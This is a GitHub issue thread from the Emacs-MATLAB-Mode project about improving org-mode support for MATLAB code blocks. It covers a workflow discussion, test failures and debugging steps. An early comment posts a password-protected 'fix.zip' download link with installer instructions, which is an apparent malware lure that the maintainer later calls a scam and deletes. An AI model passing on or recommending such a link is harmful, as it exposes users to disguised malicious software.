### ISSUE TITLE
Improve org mode support

### ISSUE THREAD

**Issue by JohnC32** [mathworks/Emacs-MATLAB-Mode#2]
Improve org mode support such that org mode with matlab can be setup fairly easily

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ouboub** [comment]
>>> "S" == Shiki  ***@***.***> writes:

> Download 
> https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
> password: changeme
> In the installer menu, select "gcc."

May I ask what is the is about?


-- 
I strongly condemn Hamas heinous despicable pogroms/atrocities on Israel
I strongly condemn Putin's war of aggression against Ukraine.
I support to deliver weapons to Ukraine's military. 
I support the EU and NATO membership of Ukraine.

**Comment by ouboub** [comment]
>>> "JC" == John Ciolfi ***@***.***> writes:

   > Improve org mode support such that org mode with matlab can be setup fairly easily

Don't we have a org-mode branch for this? What is the state of art?

-- 
I strongly condemn Hamas heinous despicable pogroms/atrocities on Israel
I strongly condemn Putin's war of aggression against Ukraine.
I support to deliver weapons to Ukraine's military. 
I support the EU and NATO membership of Ukraine.

**Comment by JohnC32** [comment]
I suspect that is a scam so I deleted the post

**Comment by JohnC32** [comment]
There are some changes needed in org mode for matlab that I need to
upstream to org mode. After that I’d like to see about simplifying the
setup so people can easily use org mode to author papers, thesis’s, etc.
with matlab code and results.

**Comment by JohnC32** [comment]
Addressed with commit bb885d6

**Comment by ouboub** [comment]
>>> "JC" == John Ciolfi ***@***.***> writes:

> Addressed with commit bb885d6



I am a bit confused. 
I just pulled.
So there is a commit, or better said a series of commits on the default branch that addresses the improvment of the org mode support, not on the org-mode branch?

If you don't mind I merge that into the org-mode and try it out (then I might merge it back, I am not a fan of giving up or deleting branches,)

In any case I would like to run some testing especially comparing it with the python engine which I used, because last time I checked the native org-mode support had problems with **fprintf**.
Today I am a bit busy though.

Please tell me whether my understanding of the branches is correct.

thanks

**Comment by JohnC32** [comment]
Hi

This is a relatively small change. There’s matlab-org.el which fixes
org-mode such that the matlab code blocks work without having to locally
advise functions in org.

I’m preparing a patch for org-mode to fix matlab support for the long term.
Once that patch is accepted, I’ll update matlab-org.el to detect if it is
working without having the fixed org mode or the older org mode and do the
right thing.

Thanks
John

**Comment by JohnC32** [comment]
Hi

I just noticed the org-mode branch. I didn't realize that was there.

I think the issue with fprintf is similar to the issue I created
https://github.com/mathworks/Emacs-MATLAB-Mode/issues/16

The matlab code blocks in
https://github.com/mathworks/Emacs-MATLAB-Mode/blob/default/examples/matlab-and-org-mode/matlab-and-org-mode.org
do work, but I think you are looking for "output" like code blocks which
currently don't work due to issues in ob-octave.el. I understand how to
fix, but won't be able to get to them for a couple days. Once I get these
working, how about I take the content from matlab-and-org-mode-python.org
<https://github.com/mathworks/Emacs-MATLAB-Mode/compare/default...org-mode#diff-454090111252280e2a9219a8e2ba275ecc843015854f6c37c932224d0b8e1a80>
and
add it as a section to the existing matlab-and-org-mode.org to illustrate
you can use other languages such as Python?

Thanks
John

**Comment by ouboub** [comment]
>>> "JC" == John Ciolfi ***@***.***> writes:

Ok, I propose I merge your changes into the org-mode branch now.

> I think the issue with fprintf is similar to the issue I created
> https://github.com/mathworks/Emacs-MATLAB-Mode/issues/16

I am not sure, I think I will add an example of how the python engine works in comparison with the native implementation.


I am right now a bit busy so I try to do this in the afternoon/evening.

Uwe

**Comment by JohnC32** [comment]
Should we be using branches or fork's? I like the github fork and then
pull-request (PR) model. How about I try that with the fprintf fix when I
get to it?

**Comment by ouboub** [comment]
>>> "JC" == John Ciolfi ***@***.***> writes:

> Should we be using branches or fork's? I like the github fork and then
> pull-request (PR) model. 

I thought pull requests are useful for those users, that **do** not have
write access. I understand the logic is

    1. Fork (basically a clone)

    2. Clone it locally if needed

    3. Create a new branch

    4. commit

    5. Start a pull request.

But for collaborators that do have write access, I find branches much
more natural and useful, 

    1. I pull

    2. I inspect/we discuss

    3. I merge into default.

Since Nidish created another pull request, I will create an issue
discussing this topic.

> How about I try that with the fprintf fix when I
> get to it?

**Comment by ouboub** [comment]
>>> "JC" == John Ciolfi ***@***.***> writes:

> Should we be using branches or fork's? I like the github fork and then
> pull-request (PR) model. 

I thought pull requests are useful for those users, that **do not** have
write access. I understand the logic is

1. Fork (basically a clone)
2. Clone it locally if needed
3. Create a new branch
4. commit
5. Start a pull request.

But for collaborators that do have write access, I find branches much
more natural and useful, 

1. I pull
2. I inspect/we discuss
3. I merge into default.

Since Nidish created another pull request, I will create an issue
discussing this topic.

> How about I try that with the fprintf fix when I
> get to it?

**Comment by JohnC32** [comment]
Hi

I think we are still learning how to best advance matlab-mode now that we have github. We really appreciate the help you give and are happy to use the workflows you'd like us to do. If you like branches, then let's use that. Can you update the CONTRIBUGING.org for people with write access to cover this case. We already have the PR case covered. 

Note, the PR model doesn't require creating a branch. You fork, make changes, then ask for a pull request (PR). From my limited contributions in github projects, this seems to be the way most are run.

Note, my contributions are done on my own time. My day job is working on Simulink, so my contributions will be somewhat sporadic. We I get free time, I'll help with items. Two items I'd like to get in better shape are org-mode and code navigation by enabling the matlab language server in Emacs (I have it working but still need to polish it).

Thanks
John

**Comment by ouboub** [comment]
>>> "JC" == John Ciolfi ***@***.***> writes:

> Hi
> I think we are still learning how to best advance matlab-mode now that
> we have github. We really appreciate the help you give and are happy
> to use the workflows you'd like us to do. 

Thanks but I also do that out of self interest 😇

> If you like branches, then let's use that. Can you update the
> CONTRIBUGING.org for people with write access to cover this case. We
> already have the PR case covered.

Ok I will try to do later, right now I want commit a change to the
org-mode branch concerning the comparison between the native org-mode
engine and the python based one.

> Note, the PR model doesn't require creating a branch. You fork, make
> changes, then ask for a pull request (PR). From my limited
> contributions in github projects, this seems to be the way most are
> run.

Well that depends 

1. On the maintainers, for example the MELPA maintainers not only
   required a branch in my fork but even strongly encouraged me to ammed
   my commits (which then implies that I have to use push -f, which I
   dislike)

2. On what you want to do:

   1. Is it a bug/document fix or something short

   2. Or a new feature, that requires testing and a couple of commits
      then I think a branch is best suited, to guarantee the development
      is not interrupted.

But in any case, if you have write access why

    1. Don't you (or someone else) just commit to the default branch,
       you have done this before

    2. And as it was the case of Nidish, you want to introduce a new
       feature, a new branch seems to be best suited, because I have to
       test the code locally so I have to pull anyway. So having a
       branch on the main repository simplifies the workflow in my
       experience. But I am curious to know whey people with write
       access find PR easier to deal with.

> Note, my contributions are done on my own time. My day job is working
> on Simulink, so my contributions will be somewhat sporadic. 

Simulink, aha I see, then I know whom to ask next 😉 (but this is off
topic)

> We I get free time, I'll help with items. Two items I'd like to get in
> better shape are org-mode and code navigation by enabling the matlab
> language server in Emacs (I have it working but still need to polish
> it).

Thanks, I appreciate a lot your contributions and I am most interested
in the org-mode interface since this is what I use most (besides 
coding in the numerical course I teach).
Uwe

**Comment by JohnC32** [comment]
If you'd like to look at the changes I make prior to putting them on the default branch, then using either fork's or branches is a nice benfit which will help prevent mistakes. So, I'm happy to work on a branch or do PR's.

For very simple stuff sending to default makes sense.

Thanks

**Comment by ouboub** [comment]
I finally could test the new org-mode native support a bit more, and it looks excellent. I added some comments on how to activate the Python engine and run a more complex test with both 'engines' 
1. the native one
2. the one based on Python

In conclusion, I could not spot any difference. If nobody protests, I will do the merge

1. first merge default into org-mod (just in case) 
2. and then back
This way the graph tells us, that org-mode is now included in our main development.
regards
Uwe

**Comment by JohnC32** [comment]
Thanks for checking the state of org-mode. Please do the merge.

After that I have an update to fix "output" code blocks that I'll send to the org-mode branch so you can check it. 

thanks,
John

**Comment by ouboub** [comment]
What the heck just happened? I did not want to close this issue

**Comment by ouboub** [comment]
> Thanks for checking the state of org-mode. Please do the merge.
> 
> After that I have an update to fix "output" code blocks that I'll send to the org-mode branch so you can check it.
> 
> thanks, John

**DONE**

**Comment by JohnC32** [comment]
I added commit 4a0f21646a01d4c8e1208e03b812346f7a394cf8 to the org-mode branch to address a few items. Can you try it? Thanks

**Comment by ouboub** [comment]
>>> "JC" == John Ciolfi ***@***.***> writes:

> I added commit 4a0f21646a01d4c8e1208e03b812346f7a394cf8 to the org-mode branch to address a few items. Can you try it? Thanks 

Thanks very much, especially for taking care of the problem if matlab-shell is not running but you want to run matlab code in a org file. I have a couple of comments, but there is a more important issue.

1. I pulled
2. make clean
3. make

And I obtain the following error
--> mstest-org: executing code block containing: disp('The results are:')

Error: user-error ("Failed to find line \"disp('The results are:')\" in matlab-and-org-mode.org")
  mapbacktrace(#f(compiled-function (evald func args flags) #<bytecode 0x14951a3e27ae83ad>))
  debug-early-backtrace()
  debug-early(error (user-error "Failed to find line \"disp('The results are:')\" in matlab-and-org-mode.org"))
  signal(user-error ("Failed to find line \"disp('The results are:')\" in matlab-and-org-mode.org"))
  user-error("Failed to find line \"%s\" in %s" "disp('The results are:')" "matlab-and-org-mode.org")
  (progn (user-error "Failed to find line \"%s\" in %s" line-in-block (buffer-name)))
  (if (not (re-search-forward (concat "^[ \11]*" (regexp-quote line-in-block)) nil t)) (progn (user-error "Failed to find line \"%s\" in %s" line-in-block (buffer-name))))
  mstest-org-execute-code-block("disp('The results are:')" "The results are:\n\na =\n\n     1     2\n     3     4\n\nb =\n\n     2     4\n     6     8")
  (save-current-buffer (set-buffer (find-file "matlab-and-org-mode.org")) (goto-char (point-min)) (customize-set-variable 'org-confirm-babel-evaluate nil) (customize-set-variable 'org-babel-load-languages '((matlab . t))) (mstest-org-execute-code-block "ans = magic(a);" "#+RESULTS:\n| 17 | 24 |  1 |  8 | 15 |\n| 23 |  5 |  7 | 14 | 16 |\n|  4 |  6 | 13 | 20 | 22 |\n| 10 | 12 | 19 | 21 |  3 |\n| 11 | 18 | 25 |  2 |  9 |") (mstest-org-execute-code-block "plot(t, y);" "#+RESULTS:\n[[file:sinewave.png]]") (mstest-org-execute-code-block "disp('The results are:')" "The results are:\n\na =\n\n     1     2\n     3     4\n\nb =\n\n     2     4\n     6     8") (kill-this-buffer) (cd current-dir) (delete-directory tmp-dir t))
  (let ((tmp-dir (make-temp-file "mstest-org" t)) (current-dir default-directory)) (copy-file "../examples/matlab-and-org-mode/matlab-and-org-mode.org" (concat tmp-dir "/matlab-and-org-mode.org")) (cd tmp-dir) (save-current-buffer (set-buffer (find-file "matlab-and-org-mode.org")) (goto-char (point-min)) (customize-set-variable 'org-confirm-babel-evaluate nil) (customize-set-variable 'org-babel-load-languages '((matlab . t))) (mstest-org-execute-code-block "ans = magic(a);" "#+RESULTS:\n| 17 | 24 |  1 |  8 | 15 |\n| 23 |  5 |  7 | 14 | 16 |\n|  4 |  6 | 13 | 20 | 22 |\n| 10 | 12 | 19 | 21 |  3 |\n| 11 | 18 | 25 |  2 |  9 |") (mstest-org-execute-code-block "plot(t, y);" "#+RESULTS:\n[[file:sinewave.png]]") (mstest-org-execute-code-block "disp('The results are:')" "The results are:\n\na =\n\n     1     2\n     3     4\n\nb =\n\n     2     4\n     6     8") (kill-this-buffer) (cd current-dir) (delete-directory tmp-dir t)))
  mstest-org()
  mstest-run-all-tests()
  command-line-1(("--eval" "(setq debug-on-error t)" "-l" "mstest.el" "--eval=(setq matlab-shell-command \"matlab\")" "--eval=(setq matlab-shell-command-switches '(\"-nodesktop\" \"-nosplash\" \"-noFigureWindows\"))" "-e" "mstest-run-all-tests"))
  command-line()
  normal-top-level()
Failed to find line "disp('The results are:')" in matlab-and-org-mode.org
make[1]: *** [Makefile:39: shelltests] Error 255

Uwe

**Comment by ouboub** [comment]
>>> "JC" == John Ciolfi ***@***.***> writes:

> I added commit 4a0f21646a01d4c8e1208e03b812346f7a394cf8 to the org-mode branch to address a few items. Can you try it? Thanks 

Thanks very much, especially for taking care of the problem if matlab-shell is not running but you want to run matlab code in a org file. I have a couple of comments, but there is a more important issue.

1. I pulled
2. make clean
3. make

And I obtain the following error

```
--> mstest-org: executing code block containing: disp('The results are:')

Error: user-error ("Failed to find line \"disp('The results are:')\" in matlab-and-org-mode.org")
  mapbacktrace(#f(compiled-function (evald func args flags) #<bytecode 0x14951a3e27ae83ad>))
  debug-early-backtrace()
  debug-early(error (user-error "Failed to find line \"disp('The results are:')\" in matlab-and-org-mode.org"))
  signal(user-error ("Failed to find line \"disp('The results are:')\" in matlab-and-org-mode.org"))
  user-error("Failed to find line \"%s\" in %s" "disp('The results are:')" "matlab-and-org-mode.org")
  (progn (user-error "Failed to find line \"%s\" in %s" line-in-block (buffer-name)))
  (if (not (re-search-forward (concat "^[ \11]*" (regexp-quote line-in-block)) nil t)) (progn (user-error "Failed to find line \"%s\" in %s" line-in-block (buffer-name))))
  mstest-org-execute-code-block("disp('The results are:')" "The results are:\n\na =\n\n     1     2\n     3     4\n\nb =\n\n     2     4\n     6     8")
  (save-current-buffer (set-buffer (find-file "matlab-and-org-mode.org")) (goto-char (point-min)) (customize-set-variable 'org-confirm-babel-evaluate nil) (customize-set-variable 'org-babel-load-languages '((matlab . t))) (mstest-org-execute-code-block "ans = magic(a);" "#+RESULTS:\n| 17 | 24 |  1 |  8 | 15 |\n| 23 |  5 |  7 | 14 | 16 |\n|  4 |  6 | 13 | 20 | 22 |\n| 10 | 12 | 19 | 21 |  3 |\n| 11 | 18 | 25 |  2 |  9 |") (mstest-org-execute-code-block "plot(t, y);" "#+RESULTS:\n[[file:sinewave.png]]") (mstest-org-execute-code-block "disp('The results are:')" "The results are:\n\na =\n\n     1     2\n     3     4\n\nb =\n\n     2     4\n     6     8") (kill-this-buffer) (cd current-dir) (delete-directory tmp-dir t))
  (let ((tmp-dir (make-temp-file "mstest-org" t)) (current-dir default-directory)) (copy-file "../examples/matlab-and-org-mode/matlab-and-org-mode.org" (concat tmp-dir "/matlab-and-org-mode.org")) (cd tmp-dir) (save-current-buffer (set-buffer (find-file "matlab-and-org-mode.org")) (goto-char (point-min)) (customize-set-variable 'org-confirm-babel-evaluate nil) (customize-set-variable 'org-babel-load-languages '((matlab . t))) (mstest-org-execute-code-block "ans = magic(a);" "#+RESULTS:\n| 17 | 24 |  1 |  8 | 15 |\n| 23 |  5 |  7 | 14 | 16 |\n|  4 |  6 | 13 | 20 | 22 |\n| 10 | 12 | 19 | 21 |  3 |\n| 11 | 18 | 25 |  2 |  9 |") (mstest-org-execute-code-block "plot(t, y);" "#+RESULTS:\n[[file:sinewave.png]]") (mstest-org-execute-code-block "disp('The results are:')" "The results are:\n\na =\n\n     1     2\n     3     4\n\nb =\n\n     2     4\n     6     8") (kill-this-buffer) (cd current-dir) (delete-directory tmp-dir t)))
  mstest-org()
  mstest-run-all-tests()
  command-line-1(("--eval" "(setq debug-on-error t)" "-l" "mstest.el" "--eval=(setq matlab-shell-command \"matlab\")" "--eval=(setq matlab-shell-command-switches '(\"-nodesktop\" \"-nosplash\" \"-noFigureWindows\"))" "-e" "mstest-run-all-tests"))
  command-line()
  normal-top-level()
Failed to find line "disp('The results are:')" in matlab-and-org-mode.org
make[1]: *** [Makefile:39: shelltests] Error 255
```
Uwe

**Comment by JohnC32** [comment]
I just sent in 2e3af97017a24adc3c15117d024a70737c141467 which should fix that. Different versions of org behave slightly differently, so I updated the advice and test to be robust to the differences I saw. If this still fails, let me know your `M-x org-version`

**Comment by ouboub** [comment]
Ha, that is the problem, I run a org version, I clone, but with mercurial not git, so 
org-version returns 
```
org-version is a variable defined in ‘org.el’.

Its value is "N/A"
```
sigh, why do lately all these packages let the version number be determined by git, let me think how to fix this

**Comment by ouboub** [comment]
> Ha, that is the problem, I run a org version, I clone, but with mercurial not git, so org-version returns
> 
> ```
> org-version is a variable defined in ‘org.el’.
> 
> Its value is "N/A"
> ```
> 
> sigh, why do lately all these packages let the version number be determined by git, let me think how to fix this

ok, more or less solved, version is 9.6.14

**Comment by ouboub** [comment]
I pulled and with commit `2e3af97017a24a` 
`make` works, thanks, I check now the rest

**Comment by JohnC32** [comment]
The way I wrote the tests, it doesn't depend on the version. Rather, I created an expected set of results for each test case, where one in the set must match. It's good the tests now pass with org 9.6.14 for you.

**Comment by ouboub** [comment]
the one run by `make` yes, that is what I said, but I want to check the source code blocks you described in the
`ChangeLog`

**Comment by ouboub** [comment]
A (small) problem.

1. I start emacs, 
2. I open an org file
3. I do **not** start the matlab-shell
4. i run the bock
``` emacs-lisp
#+begin_src matlab   :results output raw :exports results  :eval never-export 
al=1-0.99;
l=norminv(1-al/2,0,1);
n=53;
p0=15/53;
q0=1-15/53;
err=sqrt((p0*q0)/n);
ic=l*err;
disp('\begin{align*}')
fprintf('p_0&=\\frac{15}{53}=%g\\\\ \n',p0)
fprintf('\\lambda_p &=%g\\\\ \n',l)
fprintf('p_{0}&\\pm \\lambda_{1-\\frac{\\alpha }{2}}\\sqrt{\\frac{p_{0}(1-p_{0})}{n}}=% g \\pm %g\\cdot %g\\\\ \n',p0,l,err)
fprintf('p_{0}&\\pm \\lambda_{1-\\frac{\\alpha }{2}}\\sqrt{\\frac{p_{0}(1-p_{0})}{n}}=%g \\pm %g \n',p0,ic)
disp('\end{align*}')
#+end_src
```
and I receive
```




Debugger entered--Lisp error: (error "The MATLAB shell buffer does not exist")
  signal(error ("The MATLAB shell buffer does not exist"))
  error("The MATLAB shell buffer does not exist")
  matlab-shell-busy-checker(wait-for-prompt)
  matlab--org-initiate-session-advice(#f(compiled-function (&optional session params matlabp) "Create an octave inferior process buffer.\nIf there is not a current inferior-process-buffer in SESSION then\ncreate.  Return the initialized session." #<bytecode -0x29e3665f3620d8e>) "matlab" ((:colname-names) (:rowname-names) (:result-params "replace" "output" "raw") (:result-type . output) (:results . "replace output raw") (:exports . "results") (:session . "matlab") (:kernel . "matlab") (:cache . "no") (:noweb . "no") (:hlines . "no") (:tangle . "no") (:eval . "never-export")) matlab)
  apply(matlab--org-initiate-session-advice #f(compiled-function (&optional session params matlabp) "Create an octave inferior process buffer.\nIf there is not a current inferior-process-buffer in SESSION then\ncreate.  Return the initialized session." #<bytecode -0x29e3665f3620d8e>) ("matlab" ((:colname-names) (:rowname-names) (:result-params "replace" "output" "raw") (:result-type . output) (:results . "replace output raw") (:exports . "results") (:session . "matlab") (:kernel . "matlab") (:cache . "no") (:noweb . "no") (:hlines . "no") (:tangle . "no") (:eval . "never-export")) matlab))
  org-babel-octave-initiate-session("matlab" ((:colname-names) (:rowname-names) (:result-params "replace" "output" "raw") (:result-type . output) (:results . "replace output raw") (:exports . "results") (:session . "matlab") (:kernel . "matlab") (:cache . "no") (:noweb . "no") (:hlines . "no") (:tangle . "no") (:eval . "never-export")) matlab)
  org-babel-matlab-initiate-session("matlab" ((:colname-names) (:rowname-names) (:result-params "replace" "output" "raw") (:result-type . output) (:results . "replace output raw") (:exports . "results") (:session . "matlab") (:kernel . "matlab") (:cache . "no") (:noweb . "no") (:hlines . "no") (:tangle . "no") (:eval . "never-export")))
  org-babel-execute:octave("al=1-0.99;\nl=norminv(1-al/2,0,1);\nn=53;\np0=15/53;\n..." ((:colname-names) (:rowname-names) (:result-params "replace" "output" "raw") (:result-type . output) (:results . "replace output raw") (:exports . "results") (:session . "matlab") (:kernel . "matlab") (:cache . "no") (:noweb . "no") (:hlines . "no") (:tangle . "no") (:eval . "never-export")) matlab)
  org-babel-execute:matlab("al=1-0.99;\nl=norminv(1-al/2,0,1);\nn=53;\np0=15/53;\n..." ((:colname-names) (:rowname-names) (:result-params "replace" "output" "raw") (:result-type . output) (:results . "replace output raw") (:exports . "results") (:session . "matlab") (:kernel . "matlab") (:cache . "no") (:noweb . "no") (:hlines . "no") (:tangle . "no") (:eval . "never-export")))
  org-babel-execute-src-block(nil ("matlab" "al=1-0.99;\nl=norminv(1-al/2,0,1);\nn=53;\np0=15/53;\n..." ((:colname-names) (:rowname-names) (:result-params "raw" "output" "replace") (:result-type . output) (:results . "raw output replace") (:exports . "results") (:eval . "never-export") (:tangle . "no") (:hlines . "no") (:noweb . "no") (:cache . "no") (:kernel . "matlab") (:session . "matlab")) "" nil 152 "(ref:%s)"))
  org-ctrl-c-ctrl-c(nil)
  funcall-interactively(org-ctrl-c-ctrl-c nil)
  call-interactively(org-ctrl-c-ctrl-c nil nil)
  command-execute(org-ctrl-c-ctrl-c)

```
**However** the matlab-shell starts, but, no, no matlab-shell buffer!
and running the block returns
`The MATLAB shell buffer does not exist`
So I have to start the shell in a .m file
then running the above block results in 
``` latex
#+RESULTS:
\begin{align*}
p_0&=\frac{15}{53}=0.283019\\
\lambda_p &=2.57583\\
p_{0}&\pm \lambda_{1-\frac{\alpha }{2}}\sqrt{\frac{p_{0}(1-p_{0})}{n}}= 0.283019 \pm 2.57583\cdot 0.0618762\\
p_{0}&\pm \lambda_{1-\frac{\alpha }{2}}\sqrt{\frac{p_{0}(1-p_{0})}{n}}=0.283019 \pm 0.159383
\end{align*}
```

**Comment by JohnC32** [comment]
I'm unable to reproduce this. Can you try:

```
cd /path/to/Emacs-MATLAB-Mode
git checkout org-mode
git pull
make clean && make lisp -j12
M=$(pwd)
env MATLABPATH=  PATH=/matlab-install/bin:$PATH  emacs -Q -L $M -l $M/matlab-autoload.el "--eval=(customize-set-variable 'org-babel-load-languages '((matlab . t)))"
```

Then `C-x C-f file.org`, and in the matlab code block `C-c C-c` to evaluate it.

We have:

```emacs-lisp
(defun matlab--org-initiate-session-advice (orig-fun &optional session params matlabp)
  "After starting matlab-shell, wait for it to become ready.
ORIG-FUN is `org-babel-octave-initiate-session' with arguments SESSION
PARAMS MATLABP."
  ;; Consider
  ;;   1) start emacs
  ;;   2) open foo.org file containing "#+begin_src matlab :exports both :results output"
  ;;   3) C-c C-c in the code block
  ;; matlab-shell buffer *MATLAB* doesn't exist `org-babel-octave-initiate-session' will
  ;; run (matlab-shell) and without this advice, babel will insert the MATLAB code to
  ;; evaluate in the *MATLAB* buffer before it is ready. This will cause the "#+RESULTS:"
  ;; in foo.org to contain the MATLAB startup messages.
  ;; Therefore, we wait for the *MATLAB* buffer to become ready.
  (when matlabp
    (when (not (featurep 'matlab-shell))
      ;; make `matlab-shell-busy-checker' available
      (require 'matlab-shell))
    (matlab-shell-busy-checker 'error-if-busy))
  (let ((session-buffer (funcall orig-fun session params matlabp)))
    (when matlabp
      ;; When starting matlab-shell, wait for the prompt.
      (matlab-shell-busy-checker 'wait-for-prompt))
    session-buffer))
```

And the stack indicates it is occuring in the ` (matlab-shell-busy-checker 'wait-for-prompt)` call, which is after `(funcall orig-fun session params matlabp)` and this is responsible for starting matlab-shell.

Note, your matlab code block should have `raw` replaced with `latex` which will correctly handle latex output produced by the code block.

**Comment by ouboub** [comment]
Just a moment:
`env MATLABPATH=  PATH=/matlab-install/bin:$PATH `
in my case this is 
`MATLABPATH=/home/oub/ALLES/HGs/Matlab-init:`
because there are all my matlab files I have written over the years for my courses. Is this a problem?
This variable does not coincide with the the folder where emacs-matlab is located

**Comment by ouboub** [comment]
I tried it in steps, in the folder where emacs-matlab dwells.

1. `emacs -Q -l matlab-autoload.el` 
2. `customize-variable`
3. org-babel (not found because org mode is not loaded, of course `emacs -Q`!

**Comment by JohnC32** [comment]
The `PATH=/matlab-install/bin:$PATH` option is not needed if matlab is on the path `which matlab`. If matlab isn't on the path, you'll need that. I suspect you have matlab on the path, in which case, can you try:

```
env MATLABPATH=   emacs -Q -L $M -l $M/matlab-autoload.el "--eval=(customize-set-variable 'org-babel-load-languages '((matlab . t)))"
```
Where M points to the Emacs-MATLAB-Mode with org-mode branch built and the other options are ensuring we are running stock emacs with only the org-mode branch. All your other customizations will not be loaded. The idea is to see if something in your customizations is causing the problem.

**Comment by ouboub** [comment]
Fuck I deleted a comment of yours!
I wanted to delete mine, since it was stupid (I hate this issue system)

**Comment by JohnC32** [comment]
Yes, github can be confusing, but once I got used to it, I think it's pretty good.

If you have matlab on the path `which matlab`, then use:

```
cd /path/to/Emacs-MATLAB-Mode
git checkout org-mode
git pull
make clean && make lisp -j12
M=$(pwd)
env MATLABPATH=  emacs -Q -L $M -l $M/matlab-autoload.el "--eval=(customize-set-variable 'org-babel-load-languages '((matlab . t)))"
```

Followed by `C-x C-f file.org` and then `C-c C-c` in the matlab code block.

This will run emacs without your customizations to see if they are causing some issue.

**Comment by ouboub** [comment]
What is `file.org` supposed to be?

There are some problems, I did the following

1. `emacs -Q`
2. `customize-veriable` 
3. `org-babel` (not found)
4. `org-version`  9.6.15
5. then I set the variable
6. `load-file` 
7. `matlab-autoload`
8. open my file `org-mode-native-test.org`
9. error:
```
File mode specification error: (file-missing Cannot open load file No such file or directory matlab)
```
So I am very confused.

**Comment by ouboub** [comment]
Ok I followed **exactly** your advice, not my step to step approach:
I opened my problematic file `org-mode-native-test.org`
No problem,  it works!
So it is my setting, sigh
another **debugging nightmare** is waiting

**Comment by JohnC32** [comment]
Let's sync up off line - I can help you debug it.

**Comment by JohnC32** [comment]
Closing - these changes have been merged into default.
